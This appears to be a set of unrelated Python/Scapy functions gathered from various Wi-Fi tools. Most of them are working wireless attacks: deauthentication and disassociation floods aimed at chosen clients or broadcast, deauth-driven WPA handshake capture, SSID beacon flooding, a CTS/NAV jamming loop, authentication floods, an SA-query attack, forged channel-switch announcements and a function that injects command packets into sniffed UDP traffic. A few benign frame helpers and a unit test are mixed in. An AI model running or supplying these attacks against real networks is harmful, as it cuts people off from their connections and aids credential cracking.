def shoot(self, tgt): self.__c_TGT = tgt sniffer_thread = threading.Thread(target=self.start_eapol_sniffer) sniffer_thread.daemon = True sniffer_thread.start() while not self.__SNIFFER_STATUS: time.sleep(1) __pkt_to_cl = RadioTap() / Dot11( addr1=tgt, addr2=self.bssid, addr3=self.bssid) / Dot11Deauth(reason=7) __pkt_to_ap = RadioTap() / Dot11( addr1=self.bssid, addr2=tgt, addr3=tgt) / Dot11Deauth(reason=7) for n in range(32 * 1): sendp(__pkt_to_cl, iface=self.iface, count=1, verbose=False) sendp(__pkt_to_ap, iface=self.iface, count=1, verbose=False) while self.__SNIFFER_STATUS: time.sleep(1) self.__SNIFFER_STATUS = not bool(self.__SNIFFER_STATUS) if self.verify_handshake(tgt): return (True, self.__c_HANDSHAKE) else: return (False, [])
def close(self): """ Disassociate from the access point, This does not veify that the AP received the message and should be considred a best-effort attempt. errDict = { -1:"Not Connected", 0:"No Error" } """ if not self.connected: return -1 sendp(RadioTap() / Dot11(addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=0, subtype=12) / Dot11Disas(reason=3), iface=self.interface, verbose=False) sendp(RadioTap() / Dot11(addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=0, subtype=12) / Dot11Disas(reason=3), iface=self.interface, verbose=False) self.connected = False return 0
def deBuilder(self, packet, stream, genFCS): """Return the decrypted packet""" ## Remove the FCS from the old packet body postPkt = RadioTap(self.pt.byteRip(packet.copy(), chop = True, order = 'last', output = 'str', qty = 4)) ## Remove RadioTap() info if required if genFCS is False: postPkt = RadioTap()/postPkt[RadioTap].payload ## Rip off the Dot11WEP layer del postPkt[Dot11WEP] ## Add the stream to LLC decodedPkt = postPkt/LLC(str(stream)) ## Flip FCField bits accordingly if decodedPkt[Dot11].FCfield == 65: decodedPkt[Dot11].FCfield = 1 elif decodedPkt[Dot11].FCfield == 66: decodedPkt[Dot11].FCfield = 2 ## Return the decoded packet with or without FCS if genFCS is False: return decodedPkt else: return decodedPkt/Padding(load = binascii.unhexlify(self.pt.endSwap(hex(crc32(str(decodedPkt[Dot11])) & 0xffffffff)).replace('0x', '')))
def send_beacon_ex(essid, interface, privacy=PRIVACY_NONE, bssid=None, channel=6): """ Convenience function for sending beacons without a thread or creating an instance """ if not bssid: bssid = getHwAddr(interface) channel = chr(channel) sequence = randint(1200, 2000) if privacy in [PRIVACY_NONE, 'none', 'NONE']: beacon = ( RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence) / Dot11Beacon(cap='ESS+short-preamble+short-slot') / Dot11Elt(ID="SSID", info=essid) / Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') / Dot11Elt(ID="DSset", info=channel) / Dot11Elt(ID=42, info="\x04") / Dot11Elt(ID=47, info="\x04") / Dot11Elt(ID=50, info="\x0c\x12\x18\x60")) elif privacy in [PRIVACY_WEP, 'wep', 'WEP']: beacon = ( RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence) / Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot') / Dot11Elt(ID="SSID", info=essid) / Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') / Dot11Elt(ID="DSset", info=channel) / Dot11Elt(ID=42, info="\x04") / Dot11Elt(ID=47, info="\x04") / Dot11Elt(ID=50, info="\x0c\x12\x18\x60")) elif privacy in [PRIVACY_WPA, 'wpa', 'WPA']: beacon = ( RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence) / Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot') / Dot11Elt(ID="SSID", info=essid) / Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') / Dot11Elt(ID="DSset", info=channel) / Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01") / Dot11Elt(ID=42, info="\x00") / Dot11Elt(ID=50, info="\x30\x48\x60\x6c") / Dot11Elt( ID=221, info= "\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00" )) else: raise Exception('Invalid privacy setting') sendp(beacon, iface=interface, verbose=False)
def deauth(self, e): global SEQ_NUM pkts = [] deauth_pkt1 = RadioTap() / Dot11(addr1=self.client_mac, addr2=self.ap_mac, addr3=self.ap_mac) / Dot11Deauth() deauth_pkt2 = RadioTap() / Dot11( addr1=self.ap_mac, addr2=self.client_mac, addr3=self.client_mac) / Dot11Deauth() ''' Channel Switch Announcement + Dot11 \x0d Action + Raw \x00 Management \x04 CSA \x25 Element ID [37] \x03 Length \x00 Channel Switch Mode \x04 New Channel Num \x00 Channel Switch Count ''' csa_pkt = RadioTap() / Dot11( addr1=self.client_mac, addr2=self.ap_mac, addr3=self.ap_mac, type=0, subtype=0x0d) / Raw("\x00\x04\x25\x03\x00" + chr(self.client_channel) + "\x00") #csa_pkt = Jammer.append_csa(self.my_beacon, 56) pkts.append(deauth_pkt1) pkts.append(deauth_pkt2) pkts.append(csa_pkt) deauth_pkt1[RadioTap].notdecoded = deauth_pkt1[ RadioTap].notdecoded[:10] + channels[ self.ap_channel] + deauth_pkt1[RadioTap].notdecoded[12:] deauth_pkt1[RadioTap].notdecoded = deauth_pkt1[ RadioTap].notdecoded[:10] + channels[ self.ap_channel] + deauth_pkt1[RadioTap].notdecoded[12:] logger.log("Starting deauth on AP [G]" + self.ap_mac + "[/G] (" + self.ap_ssid + ") and client [G]" + self.client_mac + "[/G]...") while not e.isSet(): for p in pkts: SEQ_NUM += 1 p[RadioTap].SC = SEQ_NUM p[Dot11].FCfield |= 0x20 sendp(p, iface=self.iface_ap, inter=0.1 / len(pkts)) logger.log("Deauth [G]stopped[/G]")
def forge_ap_cl(self): _pkt_ap = RadioTap() / Dot11(addr1=self.cl, addr2=self.ap, addr3=self.ap) / Dot11Deauth(reason=7) _pkt_cl = RadioTap() / Dot11(addr1=self.ap, addr2=self.cl, addr3=self.cl) / Dot11Deauth(reason=7) if self.unlimited: while True: self.flood_ap_cl(_pkt_ap, _pkt_cl) else: for _count in range(0, self.count): self.flood_ap_cl(_pkt_ap, _pkt_cl)
def perform_deauth(router, client, iface): pckt = RadioTap() / Dot11(addr1=client, addr2=router, addr3=router) / Dot11Deauth(reason=4) cli_to_ap_pckt = RadioTap() / Dot11(addr1=router, addr2=client, addr3=client) / Dot11Deauth(reason=7) print('Sending Deauth to ' + client + ' from ' + router) try: for i in range(100): sendp(pckt, inter=0.1, count=1, loop=0, iface=iface, verbose=0) sendp(cli_to_ap_pckt, inter=0.1, count=1, loop=0, iface=iface, verbose=0) print("\U0001F608") except Exception as e: print(f"error: {e}")
def start(): ap = args.bssid client = args.client pkt = RadioTap()/Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth() pkt1 = RadioTap()/Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth() for n in range(int(args.number)): sendp(pkt, iface=args.iface, verbose=0) print("Send deauth packet: " + termcolor(ap, "green") + " (ap) > " + termcolor(client, "blue") + " (client) via " + termcolor(args.iface, "red") + " #" + str(n + 1)) sleep(0.5) sendp(pkt1, iface=args.iface, verbose=0) print("Send deauth packet: " + termcolor(client, "blue") + " (client) > " + termcolor(ap, "green") + " (ap) via " + termcolor(args.iface, "red") + " #" + str(n + 1))
def shoot(self, _sn, _rc): _pkt_ap_to_cl = RadioTap() / Dot11(addr1=_rc, addr2=_sn, addr3=_sn) / Dot11Deauth(reason=7) _pkt_cl_to_ap = RadioTap() / Dot11(addr1=_sn, addr2=_rc, addr3=_rc) / Dot11Deauth(reason=7) sendp(_pkt_ap_to_cl, iface=self.iface, count=self.deauth, verbose=False) sendp(_pkt_cl_to_ap, iface=self.iface, count=self.deauth, verbose=False) time.sleep(0.80)
def sa_query_attack(interface, ap, sta): pkt = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \ Dot11Auth(algo=0, seqnum=0x0001, status=0x0000) interface.inject(pkt) pkt = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \ Dot11AssoReq(cap=0x3104, listen_interval=0x0001) / Dot11Elt(ID=0, info="Wireless Attack Testbed") / \ Dot11EltRates() / Dot11Elt(ID='RSNinfo', info=( '\x01\x00' # RSN Version 1 '\x00\x0f\xac\x04' # Group Cipher Suite : 00-0f-ac CCMP '\x01\x00' # 2 Pairwise Cipher Suite (next line) '\x00\x0f\xac\x04' # AES Cipher '\x01\x00' # 1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' # Pre-Shared Key '\x80\x00')) # Supports MFP interface.inject(pkt)
def setPrivacy(self, value): """ Configure the privacy settings for None, WEP, and WPA """ if value == PRIVACY_NONE: self.probe_response_template = RadioTap() / Dot11( addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid) / Dot11ProbeResp( cap='ESS+privacy+short-preamble+short-slot') / Dot11Elt( ID="SSID", info='') / Dot11Elt( ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24' ) / Dot11Elt(ID="DSset", info=self.channel) / Dot11Elt( ID=42, info="\x04") / Dot11Elt( ID=47, info="\x04") / Dot11Elt( ID=50, info="\x0c\x12\x18\x60") elif value == PRIVACY_WEP: self.probe_response_template = RadioTap() / Dot11( addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid ) / Dot11ProbeResp(cap='ESS+short-preamble+short-slot') / Dot11Elt( ID="SSID", info='') / Dot11Elt( ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') / Dot11Elt( ID="DSset", info=self.channel) / Dot11Elt( ID=42, info="\x04") / Dot11Elt( ID=47, info="\x04") / Dot11Elt( ID=50, info="\x0c\x12\x18\x60") elif value == PRIVACY_WPA: self.probe_response_template = RadioTap() / Dot11( addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid ) / Dot11ProbeResp( cap='ESS+privacy+short-preamble+short-slot' ) / Dot11Elt(ID="SSID", info='') / Dot11Elt( ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24' ) / Dot11Elt(ID="DSset", info=self.channel) / Dot11Elt( ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01" ) / Dot11Elt( ID=42, info="\x00" ) / Dot11Elt( ID=50, info="\x30\x48\x60\x6c" ) / Dot11Elt( ID=221, info= "\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00" )
def test_new_packet(self): """ Tests the 'new_packet' method. """ config = Config() new_packets = Queue() sniffer = PacketSniffer(config, new_packets) self.assertEqual(sniffer.new_packets.qsize(), 0) packet = RadioTap() \ / Dot11( addr1="ff:ff:ff:ff:ff:ff", addr2="aa:bb:cc:11:22:33", addr3="dd:ee:ff:11:22:33" ) \ / Dot11ProbeReq() \ / Dot11Elt( info="Test" ) sniffer.new_packet(packet) self.assertEqual(sniffer.new_packets.qsize(), 1) ProbeRequestParser.parse(sniffer.new_packets.get(timeout=1))
def pp_deauth(blacklist): """ Starts deauthentication attack for PineAP Suite. """ os.system("reset") print "\033[1m" + banner_dos print colored( "\n------------------- ̿' ̿'\̵͇̿̿\з=(◕_◕)=ε/̵͇̿̿/'̿'̿ ---------------------\n̿", "red") print "\033[1m[--] TARGET(s): ", blacklist time.sleep(1) print "\033[1m[*] Deauthing PineAP client devices" time.sleep(2) print "\033[1m[*] Channel number being set\n" time.sleep(2) for d in blacklist: clist = sniff(iface=iface, count=30) channel = find_channel(clist, d) os.system("iwconfig wlan1mon channel " + str(channel)) print "\033[1m[*] Sending 120 deauthentication packets to ", d deauth = RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=d.lower(), addr3=d.lower()) / Dot11Deauth() sendp(deauth, iface=iface, count=120, inter=.2, verbose=False) time.sleep(1) print "\033[1m[*] Attack completed" time.sleep(2)
def asso_frame_blueprint(self, ap, cl): capibility = self.beacon.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}") efields = self.enumerate_asso_fields(self.beacon) return RadioTap() / Dot11(addr1=ap, addr2=cl, addr3=ap) / Dot11AssoReq(cap=capibility, listen_interval=3) / \ Dot11Elt(ID=efields[0]['ID'], len=efields[0]['len'], info=efields[0]['info']) / \ Dot11Elt(ID=efields[1]['ID'], len=efields[1]['len'], info=efields[1]['info']) / \ Dot11Elt(ID=efields[48]['ID'], len=efields[48]['len'], info=efields[48]['info'])
def getRSNInformation(self, essid): sendp(RadioTap() / Dot11(addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__unfuckupSC__(), subtype=4) / Dot11ProbeReq() / Dot11Elt(ID=0, info=essid) / Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c') / Dot11Elt(ID=50, info='\x0c\x12\x18\x60'), iface=self.interface, verbose=False) self.sequence += 1 sniff(iface=self.interface, store=0, timeout=self.timeout, stop_filter=self.__stopfilter__) if self.lastpacket == None or not self.lastpacket.haslayer( 'Dot11ProbeResp'): return None probeResp = self.lastpacket.getlayer(Dot11ProbeResp) tmp = probeResp.getlayer(Dot11Elt) while tmp: if tmp.fields.get('ID') == 48: rsnInfo = tmp break else: tmp = tmp.payload if rsnInfo == None: rsnInfo = '' # we didn't find it in the probe response, so we'll return an empty string else: rsnInfo = parseRSNData(rsnInfo.info) rsnInfo = buildRSNData(rsnInfo) rsnInfo = '\x30' + chr(len(rsnInfo)) + rsnInfo return rsnInfo
def cts_nav_attack(interface): # http://matej.sustr.sk/publ/articles/cts-dos/cts-dos.en.html # pkt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', pkt = RadioTap() / Dot11(type=1, subtype=12, ID=0xff7f, addr1="00:00:de:ad:be:ef") while True: interface.inject(pkt) sleep(0.01)
def trigger_channel_switch_in_device(self, iface, sta_mac_addr, target_channel, serving_channel, **kwargs): """ Transmit Channel Switch Announcement (CSA) beacon to the given STA. """ bssid = kwargs.get('bssid') self.log.debug( 'Sending CSA to {} on iface {}'.format(sta_mac_addr, iface), ' with BSSID {} switch STA to channel {}'.format( bssid, str(target_channel))) # tbd: clean up this mess data1 = ('3bc0904f0000000064000100000542494741500', '1088c129824b048606c0301') data2 = ('050400020000070c44452024081464051a84031a2d1a0c001bffff', '0000000000000000000001000000000000000000003d162c000400', '0000000000000000000000000000000000007f0800000000000000', '40dd180050f2020101800003a4000027a4000042435d0062322e00', 'dd06aaaaaa3f4325dd14aaaaaa8020544b4e2d4c6f57532d537973', '74656ddd06aaaaaa215a01250300') beacon = (RadioTap() / Dot11( type=0, subtype=8, addr1=sta_mac_addr, addr2=bssid, addr3=bssid) / binascii.unhexlify( data1 + hex(serving_channel).replace("0x", "") + data2 + hex(target_channel).replace("0x", "") + '00')) # tbd: do we really need this BEACON_ARQ = 3 for ii in range(BEACON_ARQ): # repetitive transmission sendp(beacon, iface=iface) return True
def send_wpa_enc(self, data, iv, seqnum, dest, mic_key, key_idx=0, additionnal_flag=["from-DS"], encrypt_key=None): """Send an encrypted packet with content @data, using IV @iv, sequence number @seqnum, MIC key @mic_key """ if encrypt_key is None: encrypt_key = self.tk rep = RadioTap() rep /= Dot11( addr1=dest, addr2=self.mac, addr3=self.mac, FCfield="+".join(['wep'] + additionnal_flag), SC=(next(self.seq_num) << 4), subtype=0, type="Data", ) # Assume packet is send by our AP -> use self.mac as source # Encapsule in TKIP with MIC Michael and ICV data_to_enc = build_MIC_ICV(raw(data), mic_key, self.mac, dest) # Header TKIP + payload rep /= Raw(build_TKIP_payload(data_to_enc, iv, self.mac, encrypt_key)) self.send(rep) return rep
def ssidFlood(ssid, senderMAC, channel): dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=senderMAC, addr3=senderMAC) beacon = Dot11Beacon(cap="ESS+privacy") essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid)) echann = Dot11Elt(ID="DSset", info=chr(channel)) frame = RadioTap()/dot11/beacon/essid/echann sendp(frame, inter=0.1, iface=args.iface, verbose=False, loop=1)
def get_rsn_information(self, essid): rsnInfo = None sendp(RadioTap() / Dot11(addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), subtype=4) / Dot11ProbeReq() / Dot11Elt(ID=0, info=essid) / Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c') / Dot11Elt(ID=50, info='\x0c\x12\x18\x60'), iface=self.interface, verbose=False) self.sequence += 1 sniff(iface=self.interface, store=0, timeout=self.timeout, stop_filter=self.__stopfilter__) if self.lastpacket is None or not self.lastpacket.haslayer( Dot11ProbeResp): return None probeResp = self.lastpacket.getlayer(Dot11ProbeResp) tmp = probeResp.getlayer(Dot11Elt) while tmp: if tmp.fields.get('ID') == 48: rsnInfo = tmp break else: tmp = tmp.payload if rsnInfo is None: rsnInfo = '' # Did not find rsnInfo in probe response. else: rsnInfo = build_rsn_data(parse_rsn_data(rsnInfo.info)) rsnInfo = '\x30' + chr(len(rsnInfo)) + rsnInfo return rsnInfo
def search_n_destroy(iface: str): setup_monitor(iface) pkts_stream = sniff_gen(iface=iface) for pkt in pkts_stream: if UDP in pkt: dgram = pkt[UDP] if dgram.dport == 5555: frame = ( RadioTap() / Dot11FCS( subtype=8, type="Data", proto=0, FCfield="to-DS", addr1=pkt[Dot11].addr1, addr2=pkt[Dot11].addr2, addr3=pkt[Dot11].addr3, ) / Dot11QoS(Reserved=0, Ack_Policy=0, EOSP=0, TID=0, TXOP=0) / LLC(dsap=0xAA, ssap=0xAA, ctrl=3) / SNAP(OUI=0x0, code="IPv4") / IP(version=4, proto="udp", src=pkt[IP].src, dst=pkt[IP].dst) / UDP(sport=6666, dport=5555) / Raw(load=bytes.fromhex( "436d640001001200010404000a000000808080802020202010652f" ))) sendp(frame, iface=iface) break
def wpaEncrypt(encKey, origPkt, decodedPkt, PN, genFCS=True): """Encompasses the steps needed to encrypt a WPA packet No structure for TKIP has been done as of yet """ ## Increment the PN positively per IEEE spec PN[5] += 1 ## Grab the payload of the decoded packet dEverything = decodedPkt[LLC] ## Remove the FCS from the original packet newPkt = RadioTap((pt.byteRip(origPkt.copy(), chop=True, order='last', output='str', qty=4))) del newPkt[Dot11WEP] ## The data is ready for encryption newPkt = newPkt / dEverything encodedPkt = ccmpCrypto.encryptCCMP(newPkt, encKey, PN, genFCS) ## Flip FCField bits accordingly ### DEBUG # if encodedPkt[Dot11].FCfield == 1L: # encodedPkt[Dot11].FCfield = 65L # elif encodedPkt[Dot11].FCfield == 2L: # encodedPkt[Dot11].FCfield = 66L if encodedPkt[Dot11].FCfield == 1: encodedPkt[Dot11].FCfield = 65 elif encodedPkt[Dot11].FCfield == 2: encodedPkt[Dot11].FCfield = 66 return encodedPkt
def send_ctrl_msg(json_data: str, my_mac: str, mon_interface: str = 'mon0') -> None: a = RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=my_mac, addr3="ff:ff:ff:ff:ff:ff") / json_data sendp(a, iface=mon_interface, verbose=0)
def get_radiotap_header(self): radiotap_packet = RadioTap( len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\x00\x6c' + get_frequency(self.channel) + '\xc0\x00\xc0\x01\x00\x00') return radiotap_packet
def _read_cmds_from_pcap(stream): for pkt in stream: if isinstance(pkt, Raw): pkt = RadioTap(pkt) if UDP in pkt: dgram = pkt[UDP] if dgram.dport == 5555: yield dgram
def auth_attack(interface, sta, ap): pkt = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \ Dot11Auth(algo=0, seqnum=0x0001, status=0x0000) while True: cprint("ZZZ", 'blue') interface.inject(pkt) pkt.SC += 1 sleep(0.3)
def __init__(self, interface, args): self.interface = interface self.args = args ## Create a header that works for encrypted wifi having FCS ### These bytes can be switched up, if memory serves, this is a channel 6 RadioTap() rTap = '00 00 26 00 2f 40 00 a0 20 08 00 a0 20 08 00 00 20 c8 af c8 00 00 00 00 10 6c 85 09 c0 00 d3 00 00 00 d2 00 cd 01' self.rTap = RadioTap(unhexlify(rTap.replace(' ', '')))
def run(self, args, cmd): self.cmd = cmd with db_session: bss = cmd.select_bss(args.ssid, args.bssid, args.client) if bss: if not args.bssid: args.bssid = bss.bssid if args.channel is None: args.channel = bss.channel if args.bssid is None: cmd.perror("BSSID is missing, and couldn't be obtained from the recon db.") elif args.channel is None: cmd.perror("Channel is missing, and couldn't be obtained from the recon db.") else: interface = set_monitor_mode(args.iface) if args.channel > 0: check_chset(interface, args.channel) else: args.channel = pyw.chget(interface) deauth_frame = RadioTap() / Dot11(addr1=args.client, addr2=args.bssid, addr3=args.bssid) / Dot11Deauth( reason="class3-from-nonass") args.num_frames = "infinite" if args.num_frames <= 0 else args.num_frames * 64 if compare_macs(args.client, BROADCAST_MAC): cmd.pfeedback( "[i] Sending {} deauth frames to all clients from AP {} on channel {}...".format(args.num_frames, args.bssid, args.channel)) else: cmd.pfeedback( "[i] Sending {} deauth frames to client {} from AP {} on channel {}...".format(args.num_frames, args.client, args.bssid, args.channel)) if args.num_frames == "infinite": self.inf_running = True prev_sig_handler = signal.signal(signal.SIGINT, self.sig_int_handler) cmd.pfeedback("[i] Press ctrl-c to stop.") while self.inf_running: try: sendp(deauth_frame, iface=args.iface, count=64, inter=0.002) except: pass sleep(0.5) signal.signal(signal.SIGINT, prev_sig_handler) else: sendp(deauth_frame, iface=args.iface, count=args.num_frames, inter=0.002)
def connect(self, essid, rsnInfo=''): """ Connect/Associate with an access point. errDict = { -1:"Already Connected", 0:"No Error", 1:"Failed To Get Probe Response", 2:"Failed To Get Authentication Response", 3:"Failed To Get Association Response", 4:"Authentication Request Received Fail Response", 5:"Association Request Received Fail Response" } """ # Dot11 Probe Request (to get authentication information if applicable) payload = (RadioTap() / Dot11( addr1=self.dest_mac, addr2=self.source_mac, addr3=self.dest_mac) / Dot11Auth(seqnum=1)) self.__thread_sendp__(payload) if rsnInfo is None: # None explicitly means go get it, leave it '' to proceed with out it rsnInfo = self.get_rsn_information(essid) if self.lastpacket is None or not self.lastpacket.haslayer(Dot11Auth): return 2 if self.lastpacket.getlayer(Dot11Auth).status != 0: return 4 #Dot11 Association Request payload = (RadioTap() / Dot11(addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), subtype=0) / Dot11AssoReq(cap='ESS+short-preamble+short-slot', listen_interval=10) / Dot11Elt(ID=0, info=essid) / Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c') / Dot11Elt(ID=50, info='\x0c\x12\x18\x60') / rsnInfo) self.__thread_sendp__(payload) if self.lastpacket is None or not self.lastpacket.haslayer( Dot11AssoResp): return 3 if self.lastpacket.getlayer(Dot11AssoResp).status != 0: return 5 self.connected = True self.sequence = 0 return 0
def disassociate(self): # Forge the dot11 disassociation packet dis_packet = RadioTap()/Dot11(type=0, subtype=12, addr1=self.target_mac, addr2=self.other_mac, addr3=self.other_mac)/Dot11Deauth(reason=self.reason) # Loop to send the disassociation packets to the victim device while True: # Repeat every delay value seconds time.sleep(self.delay) print("["+str(datetime.now().time())+"][+] Disassociation frames (reason "+str(self.reason)+") sent to target "+self.target_mac+" as sender endpoint "+self.other_mac) sendp(dis_packet, iface=self.interface, count=self.num, verbose=False)